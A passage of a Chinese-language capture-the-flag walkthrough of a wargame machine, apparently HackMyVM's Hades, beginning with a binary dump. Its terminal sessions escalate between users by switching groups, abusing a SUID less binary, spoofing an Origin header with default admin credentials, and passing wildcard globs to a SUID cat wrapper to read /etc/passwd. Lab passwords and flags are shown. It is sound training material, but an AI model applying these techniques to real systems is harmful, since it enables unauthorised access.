\ufffd3I\u2e2e(@U\ufffd=|P\ufffd\ufffd=\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd !\ufffd\ufffd\ufffd\ufffd=\ufffdL \ufffd\ufffd?\ufffd ` @-&gt;(@E\ufffdK^@k z @\ufffd \ufffd\ufffd\u2e2e0@dp&quot;\ufffd\u2e2e(@\ufffdYJ\ufffd(@\ufffd \ufffd&quot;\n                                                                                                                                                                          Scrt1.o__abi\n_tagcrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrybeastgroup.c__FRAME_END___DYNAMIC__GN\nU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_start_main@GLIBC_2.34_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5_edata_finiprintf@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin\n_usedgetgid@GLIBC_2.2.5_end__bss_startmain__TMC_END___ITM_registerTMCloneTable__cxa_finalize@GLIBC_2.2.5_init.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.A\nBI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.comment#886XX$I|| W\ufffd\ufffd\ufffdo\ufffd\ufffda\n                 \ufffd\ufffdi\ufffd\ufffd\ufffdq\ufffd\ufffd\ufffdo&lt;&lt;~\ufffd\ufffd\ufffdoPP\ufffd\ufffd\ufffd\ufffdB@@\ufffd\ufffd  @\ufffdpp3\ufffd\ufffd\ufffd        \ufffd  \ufffdL L ,\ufffdx x \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd=\ufffd-\ufffd\ufffd?\ufffd\ufffd\ufffd?\ufffd@0\n                                                                                               (@(0(0H0\ufffd\ufffd3\ufffd5\u2e2e\nhermione@hades:~$ cat mission.txt \n################\n# MISSION 0x34 #\n################\n\n## EN ##\nUser hero only talks to some groups.\n\n## ES ##\nLa usuaria hero solo se habla con algunos grupos.\nhermione@hades:~$ whoami;id\nhermione\nuid=2025(hermione) gid=2025(hermione) groups=2025(hermione),6666(beast)\nhermione@hades:~$ group hero\n-bash: group: command not found\nhermione@hades:~$ .\/beastgroup \n\nI only trust group 6666, you are group 2025\nhermione@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 1 root     hermione  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root     root      4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hermione hermione   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hermione hermione  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hermione hermione   807 Apr 23  2023 .profile\n-rwxrwxrwx 1 hermione hermione 16056 Apr  5 06:36 beastgroup\n-rw-r----- 1 root     hermione    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root     hermione   158 Apr  5 06:36 mission.txt\nhermione@hades:~$ strings beastgroup \n\/lib64\/ld-linux-x86-64.so.2\nputs\n__libc_start_main\n__cxa_finalize\ngetgid\nprintf\nlibc.so.6\nGLIBC_2.2.5\nGLIBC_2.34\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nPTE1\nu+UH\nI only trust group 6666, you are group %i\nvlImTDSGnTMwLFgRWCOc\n;*3$&quot;\nGCC: (Debian 12.2.0-14) 12.2.0\nScrt1.o\n__abi_tag\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.0\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nbeastgroup.c\n__FRAME_END__\n_DYNAMIC\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_start_main@GLIBC_2.34\n_ITM_deregisterTMCloneTable\nputs@GLIBC_2.2.5\n_edata\n_fini\nprintf@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\ngetgid@GLIBC_2.2.5\n_end\n__bss_start\nmain\n__TMC_END__\n_ITM_registerTMCloneTable\n__cxa_finalize@GLIBC_2.2.5\n_init\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.property\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n<p>\u4e0d\u8fc7\u770b\u7fa4\u4e3b\u64cd\u4f5c\u7684\u65f6\u5019\u8bf4\u8fd9\u4e2a\u529e\u6cd5\u597d\u50cf\u662f\u4f5c\u5f0a\uff0c\u5636\uff0c\u884c\u5427\uff0c\u518d\u60f3\u60f3\u5176\u4ed6\u529e\u6cd5:<\/p>\n<pre><code class=\"language-bash\">hermione@hades:~$ ls -la\ntotal 52\ndrwxr-x--- 1 root     hermione  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root     root      4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hermione hermione   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hermione hermione  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hermione hermione   807 Apr 23  2023 .profile\n-rwxrwxrwx 1 hermione hermione 16056 Apr  5 06:36 beastgroup\n-rw-r----- 1 root     hermione    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root     hermione   158 Apr  5 06:36 mission.txt\nhermione@hades:~$ newgrp beast\nhermione@hades:~$ id\nuid=2025(hermione) gid=6666(beast) groups=6666(beast),2025(hermione)\nhermione@hades:~$ .\/beastgroup \n\nvlImTDSGnTMwLFgRWCOc<\/code><\/pre>\n<p>\u4f7f\u7528<code>beast<\/code>\u5207\u6362\u4e3b\u7528\u6237\u7ec4\u5373\u53ef\uff01<\/p>\n<h2>35 hero<\/h2>\n<pre><code class=\"language-bash\">hero@hades:~$ ls -la \ntotal 48\ndrwxr-x--- 2 root hero  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root  4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hero hero   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hero hero  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hero hero   807 Apr 23  2023 .profile\n---s--s--- 1 root hero 16056 Apr  5 06:36 cleaner\n-rw-r----- 1 root hero    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root hero   173 Apr  5 06:36 mission.txt\nhero@hades:~$ cat flagz.txt \n^KUEUoYgCWKlUTpywGeK^\nhero@hades:~$ cat mission.txt \n################\n# MISSION 0x35 #\n################\n\n## EN ##\nUser hestia likes to keep the screen clean.\n\n## ES ##\nA la usuaria hestia le gusta mantener la pantalla limpia.\nhero@hades:~$ sudo -l\n[sudo] password for hero: \nSorry, user hero may not run sudo on hades.\nhero@hades:~$ whoami;id\nhero\nuid=2026(hero) gid=2026(hero) groups=2026(hero)\nhero@hades:~$ .\/cleaner \nhero@hades:~$ .\/cleaner \nhero@hades:~$ .\/cleaner \nhero@hades:~$ clear\nhero@hades:~$ find \/ -name hero -type f 2&gt;\/dev\/null\nhero@hades:~$ find \/ -group hero -type f 2&gt;\/dev\/null\n.........\nhero@hades:~$ whoami;id \nhero\nuid=2026(hero) gid=2226(her0) groups=2226(her0),2026(hero)\nhero@hades:~$ find \/ -name her0 -type f 2&gt;\/dev\/null\nhero@hades:~$ find \/ -group her0 -type f 2&gt;\/dev\/null | grep -v &quot;proc&quot;\n\/usr\/share\/libs\nhero@hades:~$ cat \/usr\/share\/libs\nopTNnZQAuFJsauNPHXVq<\/code><\/pre>\n<h2>36 hestia<\/h2>\n<pre><code class=\"language-bash\">hestia@hades:~$ whoami;id\nhestia\nuid=2027(hestia) gid=2027(hestia) groups=2027(hestia)\nhestia@hades:~$ ls -la\ntotal 228\ndrwxr-x--- 2 root   hestia   4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root     4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hestia hestia    220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hestia hestia   3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hestia hestia    807 Apr 23  2023 .profile\n-rw-r----- 1 root   hestia     22 Apr  5 06:36 flagz.txt\n-r-s--s--- 1 ianthe hestia 198960 Apr  5 06:36 less\n-rw-r----- 1 root   hestia    157 Apr  5 06:36 mission.txt\nhestia@hades:~$ grep -ra &#039;\\^*\\^&#039; .\ngrep: .\/less: Permission denied\n.\/flagz.txt:^mIZKIDJYZQDogbkwRGy^\nhestia@hades:~$ cat mission.txt \n################\n# MISSION 0x36 #\n################\n\n## EN ##\nUser ianthe has left us her own less.\n\n## ES ##\nLa usuaria ianthe nos ha dejado su propio less.\nhestia@hades:~$ sudo -l\n[sudo] password for hestia: \nSorry, user hestia may not run sudo on hades.\nhestia@hades:~$ .\/less \nMissing filename (&quot;less --help&quot; for help)\nhestia@hades:~$ .\/less \/pwned\/ianthe\/flagz.txt\n\/pwned\/ianthe\/flagz.txt: Permission denied<\/code><\/pre>\n<p>\u6ce8\u610f\u5230\u662fsuid\u6743\u9650\u7684\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/less\/#suid\">https:\/\/gtfobins.github.io\/gtfobins\/less\/#suid<\/a><\/p>\n<blockquote>\n<p>If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (&lt;= Stretch) that allow the default sh shell to run with SUID privileges.<br \/>\nThis example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.<br \/>\nsudo install -m =xs $(which less) .<br \/>\n.\/less file_to_read<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">hestia@hades:~$ ls -la\ntotal 228\ndrwxr-x--- 2 root   hestia   4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root   root     4096 Apr  5 06:36 ..\n-rw-r--r-- 1 hestia hestia    220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 hestia hestia   3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 hestia hestia    807 Apr 23  2023 .profile\n-rw-r----- 1 root   hestia     22 Apr  5 06:36 flagz.txt\n-r-s--s--- 1 ianthe hestia 198960 Apr  5 06:36 less\n-rw-r----- 1 root   hestia    157 Apr  5 06:36 mission.txt\nhestia@hades:~$ find \/ -user ianthe -type f 2&gt;\/dev\/null\n\/opt\/ianthe_pass.txt\n\/var\/tmp\/ab.txt\n\/pwned\/hestia\/less\nhestia@hades:~$ find \/ -group ianthe -type f 2&gt;\/dev\/null\n\/opt\/ianthe_pass.txt\n\/var\/tmp\/ab.txt\nhestia@hades:~$ .\/less \/opt\/ianthe_pass.txt<\/code><\/pre>\n<p>\u5f97\u5230 DphioLqgVIIFclTwBsMP<\/p>\n<h2>37 ianthe<\/h2>\n<pre><code class=\"language-bash\">ianthe@hades:~$ ls -la\ntotal 36\ndrwxr-x--- 1 root   ianthe 4096 Jun 14 08:08 .\ndrwxr-xr-x 1 root   root   4096 Apr  5 06:36 ..\n-rw-r--r-- 1 ianthe ianthe  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 ianthe ianthe 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 ianthe ianthe  807 Apr 23  2023 .profile\n-rw-r----- 1 root   ianthe   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root   ianthe  448 Jun 14 08:08 mission.txt\nianthe@hades:~$ grep -ra &#039;\\^*\\^&#039; . \n.\/flagz.txt:^SdoibXIPAdqIdzDrYId^\nianthe@hades:~$ sudo -l\n[sudo] password for ianthe: \nSorry, user ianthe may not run sudo on hades.\nianthe@hades:~$ cat mission.txt \n################\n# MISSION 0x37 #\n################\n\n## EN ##\nSeems that irene is developing an auth system http:\/\/localhost\/irene_auth.php only accessible by hackmyvm.hmv.\n(No bruteforce required, just some &quot;admin&quot; default pass :) )\n## ES ##\nParece que irene esta desarrollando algun sistema de autenticacion http:\/\/localhost\/irene_auth.php solo accesible por hackmyvm.hmv.\n(No se requiere bruteforce, solo algunas pass por defecto de &quot;admin&quot; :) )\nianthe@hades:~$ curl -si http:\/\/localhost\/irene_auth.php \nHTTP\/1.1 403 Forbidden\nServer: nginx\/1.22.1\nDate: Wed, 03 Jul 2024 15:53:13 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nSet-Cookie: PHPSESSID=7ve2pf2i59dh4t4vkk305g6qb6; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nianthe@hades:~$ cat \/etc\/hosts\n127.0.0.1       localhost\n::1     localhost ip6-localhost ip6-loopback\nfe00::0 ip6-localnet\nff00::0 ip6-mcastprefix\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n172.66.0.66     hades\n127.0.0.1       hades.hmv\n127.0.0.1       whatsmypass.hmv\nianthe@hades:~$ curl whatsmypass.hmv\nHXisrOPSdTcSSTEyyaLn\n\nianthe@hades:~$ curl -si -H &quot;Referer: http:\/\/hackmyvm.hmv\/&quot; -H &quot;X-Forwarded-For: hackmyvm.hmv&quot; http:\/\/localhost\/irene_auth.php?admin\nHTTP\/1.1 403 Forbidden\nServer: nginx\/1.22.1\nDate: Wed, 03 Jul 2024 16:00:51 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nSet-Cookie: PHPSESSID=ep12lrp0qpv31p26mb5690d1nr; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nianthe@hades:~$ curl -si -H &quot;Referer: hackmyvm.hmv&quot; -H &quot;X-Forwarded-For: hackmyvm.hmv&quot; -H &quot;Origin: hackmyvm.hmv&quot;  http:\/\/localhost\/irene_auth.php?auth=admin -X POST -d &quot;username=admin&amp;password=admin&quot;\nHTTP\/1.1 200 OK\nServer: nginx\/1.22.1\nDate: Thu, 04 Jul 2024 01:50:40 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nSet-Cookie: PHPSESSID=sq767lngu1m0t17fk22uhaoqpe; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nAccess-Control-Allow-Origin: hackmyvm.hmv\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization\n\n            &lt;form method=&quot;post&quot; action=&quot;&quot;&gt;\n                &lt;label for=&quot;username&quot;&gt;Username:&lt;\/label&gt;\n                &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; required&gt;\n                &lt;br&gt;\n                &lt;label for=&quot;password&quot;&gt;Password:&lt;\/label&gt;\n                &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; required&gt;\n                &lt;br&gt;\n                &lt;input type=&quot;submit&quot; value=&quot;Login&quot;&gt;\n            &lt;\/form&gt;\nianthe@hades:~$ curl -si -H &quot;Referer: hackmyvm.hmv&quot; -H &quot;X-Forwarded-For: hackmyvm.hmv&quot; -H &quot;Origin: hackmyvm.hmv&quot;  http:\/\/localhost\/irene_auth.php?auth=admin -X POST -d &quot;username=admin&amp;password=admin&quot;\nHTTP\/1.1 302 Found\nServer: nginx\/1.22.1\nDate: Thu, 04 Jul 2024 01:51:18 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nSet-Cookie: PHPSESSID=udpclfue0nanu2dsalf3mmoa6d; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nAccess-Control-Allow-Origin: hackmyvm.hmv\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization\nLocation: index.php\n\nTDyuLyWLDksEhgmAYDJC<\/code><\/pre>\n<p>\u5b9e\u9645\u4e0a\u53ea\u6709\u6700\u540e\u4e00\u4e2a\u6709\u6548\uff1a<\/p>\n<pre><code class=\"language-bash\">ianthe@hades:~$ curl -si -H &quot;Origin: hackmyvm.hmv&quot;  http:\/\/localhost\/irene_auth.php?auth=admin\nHTTP\/1.1 200 OK\nServer: nginx\/1.22.1\nDate: Thu, 04 Jul 2024 01:56:29 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nSet-Cookie: PHPSESSID=tsgevgkt5d9pg7ftdjc6qskc7t; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nAccess-Control-Allow-Origin: hackmyvm.hmv\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization\n\n            &lt;form method=&quot;post&quot; action=&quot;&quot;&gt;\n                &lt;label for=&quot;username&quot;&gt;Username:&lt;\/label&gt;\n                &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; required&gt;\n                &lt;br&gt;\n                &lt;label for=&quot;password&quot;&gt;Password:&lt;\/label&gt;\n                &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; required&gt;\n                &lt;br&gt;\n                &lt;input type=&quot;submit&quot; value=&quot;Login&quot;&gt;\n            &lt;\/form&gt;\n            ianthe@hades:~$\nianthe@hades:~$ curl -si -H &quot;Origin: hackmyvm.hmv&quot;  http:\/\/localhost\/irene_auth.php?auth=admin -X POST -d &quot;username=admin&amp;password=admin&quot;\nHTTP\/1.1 302 Found\nServer: nginx\/1.22.1\nDate: Thu, 04 Jul 2024 01:57:30 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nSet-Cookie: PHPSESSID=6qugl5ch197pqvpnelnvd8gq3o; path=\/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nAccess-Control-Allow-Origin: hackmyvm.hmv\nAccess-Control-Allow-Credentials: true\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization\nLocation: index.php\n\nTDyuLyWLDksEhgmAYDJC<\/code><\/pre>\n<h2>38 irene<\/h2>\n<pre><code class=\"language-bash\">~$ whoami;id\nirene\nuid=2029(irene) gid=2029(irene) groups=2029(irene)\nirene@hades:~$ ls -la\ntotal 48\ndrwxr-x--- 2 root  irene  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root  root   4096 Apr  5 06:36 ..\n-rw-r--r-- 1 irene irene   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 irene irene  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 irene irene   807 Apr 23  2023 .profile\n-rw-r----- 1 root  irene    22 Apr  5 06:36 flagz.txt\n---s--s--- 1 root  irene 16216 Apr  5 06:36 hatechars\n-rw-r----- 1 root  irene   145 Apr  5 06:36 mission.txt\nirene@hades:~$ cat flagz.txt\n^ZACnrFArVosWGJNfPkN^\nirene@hades:~$ cat mission.txt \n################\n# MISSION 0x38 #\n################\n\n## EN ##\nUser iris hates some characters.\n\n## ES ##\nLa usuaria iris odia algunos caracteres.\nirene@hades:~$ echo &#039;&#039; &gt; \/tmp\/temp_char\nirene@hades:~$ ls -la \/tmp\/temp_char\n-rw-r--r-- 1 irene irene 1 Jul  4 02:12 \/tmp\/temp_char\nirene@hades:~$ cat \/tmp\/temp_char\n\nirene@hades:~$ .\/hatechars \nEnter file to show:\n\/tmp\/temp_char\nInvalid character!!\nirene@hades:~$ rm \/tmp\/temp_char\nirene@hades:~$ touch \/tmp\/temp_char\nirene@hades:~$ ls -la \/tmp\/temp_char\n-rw-r--r-- 1 irene irene 0 Jul  4 02:15 \/tmp\/temp_char\nirene@hades:~$ .\/hatechars \nEnter file to show:\n\/tmp\/temp_char\nInvalid character!!\nirene@hades:~$ .\/hatechars -h\nEnter file to show:\n\/dev\/null\nInvalid character!!\nirene@hades:~$ .\/hatechars   \nEnter file to show:\n!\n\/bin\/cat: &#039;!&#039;: No such file or directory\nirene@hades:~$ ls -l \/bin\/cat:\nls: cannot access &#039;\/bin\/cat:&#039;: No such file or directory\nirene@hades:~$ ls -l \/bin\/cat \n-rwxr-xr-x 1 root root 44016 Sep 20  2022 \/bin\/cat\nirene@hades:~$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\nirene@hades:~$ ls -l \/usr\/bin\/cat\n-rwxr-xr-x 1 root root 44016 Sep 20  2022 \/usr\/bin\/cat\nirene@hades:~$ diff \/bin\/cat \/usr\/bin\/cat\nirene@hades:~$ find \/ -user irene 2&gt;\/dev\/null | grep -v proc\n\/dev\/pts\/2\n\/dev\/pts\/1\n\/dev\/pts\/8\n\/var\/tmp\/xx\n\/var\/tmp\/cat\n\/var\/tmp\/hatechars\n\/var\/tmp\/gg\n\/pwned\/irene\/.bash_logout\n\/pwned\/irene\/.bashrc\n\/pwned\/irene\/.profile\nirene@hades:~$ find \/ -group irene 2&gt;\/dev\/null | grep -v proc\n\/var\/tmp\/xx\n\/var\/tmp\/cat\n\/var\/tmp\/hatechars\n\/var\/tmp\/gg\n\/pwned\/irene\n\/pwned\/irene\/.bash_logout\n\/pwned\/irene\/.bashrc\n\/pwned\/irene\/hatechars\n\/pwned\/irene\/flagz.txt\n\/pwned\/irene\/mission.txt\n\/pwned\/irene\/.profile<\/code><\/pre>\n<pre><code class=\"language-text\">Dec Hex    Dec Hex    Dec Hex  Dec Hex  Dec Hex  Dec Hex   Dec Hex   Dec Hex\n0 00 NUL  16 10 DLE  32 20    48 30 0  64 40 @  80 50 P   96 60 `  112 70 p\n1 01 SOH  17 11 DC1  33 21 !  49 31 1  65 41 A  81 51 Q   97 61 a  113 71 q\n2 02 STX  18 12 DC2  34 22 &quot;  50 32 2  66 42 B  82 52 R   98 62 b  114 72 r\n3 03 ETX  19 13 DC3  35 23 #  51 33 3  67 43 C  83 53 S   99 63 c  115 73 s\n4 04 EOT  20 14 DC4  36 24 $  52 34 4  68 44 D  84 54 T  100 64 d  116 74 t\n5 05 ENQ  21 15 NAK  37 25 %  53 35 5  69 45 E  85 55 U  101 65 e  117 75 u\n6 06 ACK  22 16 SYN  38 26 &amp;  54 36 6  70 46 F  86 56 V  102 66 f  118 76 v\n7 07 BEL  23 17 ETB  39 27 &#039;  55 37 7  71 47 G  87 57 W  103 67 g  119 77 w\n8 08 BS   24 18 CAN  40 28 (  56 38 8  72 48 H  88 58 X  104 68 h  120 78 x\n9 09 HT   25 19 EM   41 29 )  57 39 9  73 49 I  89 59 Y  105 69 i  121 79 y\n10 0A LF   26 1A SUB  42 2A *  58 3A :  74 4A J  90 5A Z  106 6A j  122 7A z\n11 0B VT   27 1B ESC  43 2B +  59 3B ;  75 4B K  91 5B [  107 6B k  123 7B {\n12 0C FF   28 1C FS   44 2C ,  60 3C &lt;  76 4C L  92 5C \\  108 6C l  124 7C |\n13 0D CR   29 1D GS   45 2D -  61 3D =  77 4D M  93 5D ]  109 6D m  125 7D }\n14 0E SO   30 1E RS   46 2E .  62 3E &gt;  78 4E N  94 5E ^  110 6E n  126 7E ~\n15 0F SI   31 1F US   47 2F \/  63 3F ?  79 4F O  95 5F _  111 6F o  127 7F DEL<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5199\u4e00\u4e2a\u811a\u672c\uff0c\u5c06\u6240\u6709\u5b57\u7b26\u5199\u5230\u4e00\u4e2a\u6587\u4ef6\u5939\u4e2d\uff0c\u7136\u540e\u8fdb\u884c\u5c1d\u8bd5:<\/p>\n<pre><code class=\"language-bash\">import os\n\noutput_folder = &#039;ascii_chars&#039;\nos.makedirs(output_folder, exist_ok=True)\n\nfor i in range(128):\n    char = chr(i)\n    filename = os.path.join(output_folder, f&#039;char_{i}.txt&#039;)\n    with open(filename, &#039;w&#039;, encoding=&#039;utf-8&#039;) as f:\n        f.write(char)\n\nprint(&quot;All ASCII characters have been written to files.&quot;)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528:<\/p>\n<pre><code class=\"language-bash\">hgbe02@pwn:~\/temp\/temp_txt\/ascii_chars$ for i in {0..127}; do printf \/var\/tmp\/ascii_chars\/char_$i.txt;printf &#039;\\n&#039;; done       \n\/var\/tmp\/ascii_chars\/char_0.txt\n\/var\/tmp\/ascii_chars\/char_1.txt\n\/var\/tmp\/ascii_chars\/char_2.txt\n\/var\/tmp\/ascii_chars\/char_3.txt\n\/var\/tmp\/ascii_chars\/char_4.txt\n\/var\/tmp\/ascii_chars\/char_5.txt\n.......\nhgbe02@pwn:~\/temp\/temp_txt\/ascii_chars$ cat *.txt !&quot;#$%&amp;&#039;()*+,-.\/0\n\ndefghijklm\n          nopqrstuvw\n\u2e2e123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNPQRSTUVWXY       Z[\\]^_`abc\n\nirene@hades:~$ for i in {0..127}; do printf \/var\/tmp\/ascii_chars\/char_$i.txt | .\/hatechars; done | grep -v Invalid | uniq\nEnter file to show:<\/code><\/pre>\n<p>\u90fd\u672a\u80fd\u6210\u529f,\u5728<code>\/var\/tmp<\/code>\u770b\u5230\u4e86\u4e00\u4e2a\u50cf\u63d0\u793a\u7684\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">irene@hades:\/var\/tmp$ cat cat\n#!\/bin\/bash\n \/bin\/cat  &quot;$@&quot;\n irene@hades:\/var\/tmp$ .\/cat\nwhoami\nwhoami\nid\nid\n^C<\/code><\/pre>\n<p>&quot;$@&quot; \u662f\u4e00\u4e2a\u7279\u6b8a\u7684 shell \u53d8\u91cf\uff0c\u7528\u6765\u5f15\u7528\u4f20\u9012\u7ed9\u811a\u672c\u6216\u51fd\u6570\u7684\u6240\u6709\u53c2\u6570\uff0c\u6bcf\u4e2a\u53c2\u6570\u90fd\u4f5c\u4e3a\u4e00\u4e2a\u72ec\u7acb\u7684\u5b57\u7b26\u4e32\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u548b\u5229\u7528\uff0c\u770b\u5230\u4e86\u8fd9\u7bc7\u6587\u7ae0\uff1a<a href=\"https:\/\/blog.csdn.net\/l_liangkk\/article\/details\/105649018\">https:\/\/blog.csdn.net\/l_liangkk\/article\/details\/105649018<\/a><\/p>\n<pre><code class=\"language-bash\">irene@hades:~$ .\/hatechars \nEnter file to show:\n$#\n\/bin\/cat: 0: No such file or directory\nirene@hades:~$ .\/hatechars \nEnter file to show:\n$$\n\/bin\/cat: 19057: No such file or directory<\/code><\/pre>\n<p>\u8fd9\u91cc\u601d\u8def\u5c31\u65ad\u6389\u4e86\uff0c\u540e\u9762\u8bf7\u6559\u7fa4\u91cc\u7684Frank\u5e08\u5085\uff0c\u4ed6\u6307\u70b9\u4e86\u4ee5\u4e0b\u505a\u6cd5\uff0c\u548c\u4e0a\u9762\u5173\u7cfb\u4e0d\u5927\uff1b<\/p>\n<pre><code class=\"language-bash\">irene@hades:~$ find \/ -user iris 2&gt;\/dev\/null | grep -v proc\n\/dev\/pts\/5\n\/etc\/met.txt\nirene@hades:\/etc$ \/pwned\/irene\/hatechars\nEnter file to show:\n???????\n# \/etc\/aliases\nmailer-daemon: postmaster\npostmaster: root\nnobody: root\n......\n$endif\nset ask askcc append dot save crt\nignore Received Message-Id Resent-Message-Id Status Mail-From Return-Path Via Delivered-To\nFiqGNcXumTKwLTPRqXMh\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n......\n\nirene@hades:\/etc$ \/pwned\/irene\/hatechars \nEnter file to show:\n?????????\nmulti on\nDebian GNU\/Linux 12\nTZif2UTCTZif2UTC\nUTC0\n#\n.......<\/code><\/pre>\n<h2>39 iris<\/h2>\n<pre><code class=\"language-bash\">iris@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root iris 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r--r-- 1 iris iris  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 iris iris 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 iris iris  807 Apr 23  2023 .profile\n-rw-r----- 1 root iris   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root iris  137 Apr  5 06:36 mission.txt\niris@hades:~$ grep -ra &#039;\\^*\\^&#039; .\n.\/flagz.txt:^xXcULtRBXxcHIUVxtXT^\niris@hades:~$ cat mission.txt \n################\n# MISSION 0x39 #\n################\n\n## EN ##\nUser kore likes to navigate! \n\n## ES ##\nA la usuaria kore le gusta navegar!\niris@hades:~$ find \/ -user iris 2&gt;\/dev\/null | grep -v proc 